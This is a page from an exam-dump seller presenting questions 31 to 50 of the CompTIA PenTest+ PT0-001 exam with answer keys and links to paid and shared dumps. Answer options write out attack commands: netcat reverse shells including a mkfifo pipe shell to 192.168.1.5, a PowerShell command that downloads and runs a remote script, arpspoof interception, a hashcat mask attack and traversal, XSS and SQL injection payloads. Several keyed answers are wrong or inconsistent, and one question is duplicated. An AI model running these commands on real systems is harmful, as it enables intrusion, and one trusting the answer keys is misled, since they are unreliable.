[Q31-Q50] Excellent PT0-001 PDF Dumps With 100% PrepAwayPDF Exam Passing Guaranted [Sep-2021]

Share

Excellent PT0-001 PDF Dumps With 100% PrepAwayPDF Exam Passing Guaranted [Sep-2021]

100% Pass Your PT0-001 CompTIA PenTest+ Certification Exam at First Attempt with PrepAwayPDF

NEW QUESTION 31
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

  • A. nmap
  • B. burpsuite
  • C. responder
  • D. arpspoof

Answer: A

Explanation:
Explanation/Reference:
References http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/

 

NEW QUESTION 32
A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?

  • A. hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt
  • B. hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt
  • C. hashc&t -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a
  • D. hashcax -m 500 hash.txt

Answer: C

 

NEW QUESTION 33
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
Code review
Updates to firewall settings
Which of the following has occurred in this situation?

  • A. Risk acceptance
  • B. Post-mortem review
  • C. Scope creep
  • D. Threat prevention

Answer: C

 

NEW QUESTION 34
Click the exhibit button.

Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)

  • A. Arbitrary code execution
  • B. Cross-site request forgery
  • C. Session hijacking
  • D. SQL injection
  • E. Login credential brute-forcing

Answer: C,E

 

NEW QUESTION 35
A malicious user wants to perform an MITM attach on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

  • A. arpspoof -t 192.168.1.20 192.168.1.254
  • B. arpspoof -r -t 192 .168.1.253 192.168.1.20
  • C. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
  • D. arpspoof -c both -t 192.168.1.20 192.168.1.253

Answer: A

 

NEW QUESTION 36
A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

  • A. arpspoof -t 192.168.1.20 192.168.1.254
  • B. arpspoof -r -t 192 .168.1.253 192.168.1.20
  • C. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
  • D. arpspoof -c both -t 192.168.1.20 192.168.1.253

Answer: A

 

NEW QUESTION 37
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

  • A. Shodan
  • B. SET
  • C. Maltego
  • D. BeEF
  • E. Wireshark
  • F. Dynamo

Answer: A,C

Explanation:
References: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/#gref

 

NEW QUESTION 38
A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

  • A. Application Whitelisting
  • B. Shell escape
  • C. Insecure file permissions
  • D. Writable service

Answer: C

Explanation:
References https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr

 

NEW QUESTION 39
A security consultant is trying to attack a device with a previous identified user account.

Which of the following types of attacks is being executed?

  • A. Reverse shell attack
  • B. Credential dump attack
  • C. DLL injection attack
  • D. Pass the hash attack

Answer: D

 

NEW QUESTION 40
While engaging clients for a penetration test from highly regulated industries, which of the following is usually the MOST important to the clients from a business perspective?

  • A. Risk summary and executive summary
  • B. NDA and MSA
  • C. SOW and final report
  • D. Letter of engagement and attestation of findings

Answer: B

 

NEW QUESTION 41
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing.
Which of the following is MOST likely preventing proxying of all traffic?

  • A. Closed ports
  • B. Misconfigured routes
  • C. Certificate pinning
  • D. Strong cipher suites

Answer: C

 

NEW QUESTION 42
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

  • A. nc 192.168.1.5 44444
  • B. nc -e /bin/sh 192.168.1.5 44444
  • C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
  • D. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
  • E. nc -nlvp 44444 -e /bin/sh
  • F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

Answer: D,E

Explanation:
Explanation/Reference: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/

 

NEW QUESTION 43
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

  • A. XMAS scan
  • B. TCP SYN flood
  • C. xss
  • D. SQL injection

Answer: D

 

NEW QUESTION 44
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed by this command?

  • A. Run an encoded command.
  • B. Instantiate an object.
  • C. Set the execution policy.
  • D. Execute a remote script.

Answer: D

 

NEW QUESTION 45
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

  • A. Decompile.
  • B. Convert to JAR.
  • C. Cross-compile the application.
  • D. Re-sign the APK.
  • E. Convert JAR files to DEX.
  • F. Attach to ADB.

Answer: A,B

 

NEW QUESTION 46
After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?

  • A. SERVICES and ADMINS
  • B. ADMINS and IPCS
  • C. C$ and ADMINS
  • D. IPCS and C$

Answer: A

 

NEW QUESTION 47
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

  • A. Apply additional network access control.
  • B. Increase minimum password complexity requirements.
  • C. Require multifactor authentication for all logins.
  • D. Disable remote logons for local administrators.
  • E. Randomize local administrator credentials for each machine.
  • F. Segment each host into its own VLAN.
  • G. Enable full-disk encryption on every workstation.

Answer: B,C

 

NEW QUESTION 48
A penetration tester has identified a directory traversal vulnerability. Which of the following payloads could have helped the penetration tester identify this vulnerability?

  • A. || is /tmp/
  • B. "><script>document.location=/root/</script>
  • C. && dir C:/
  • D. ../../../../../../../../
  • E. 'or 'folder' like 'file'; --

Answer: D

Explanation:
Explanation
Explanation/Reference: https://www.sciencedirect.com/topics/computer-science/directory-traversal

 

NEW QUESTION 49
A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?

  • A. W3AF
  • B. Swagger
  • C. NiktO
  • D. WAR

Answer: B

 

NEW QUESTION 50
......

Trend for PT0-001 pdf dumps before actual exam: https://www.prepawaypdf.com/CompTIA/PT0-001-practice-exam-dumps.html

Real Exam Questions & Answers - CompTIA PT0-001 Dump is Ready: https://drive.google.com/open?id=1TDPe2zxqUyiou1JqX6MI6WjcaSsHbn4-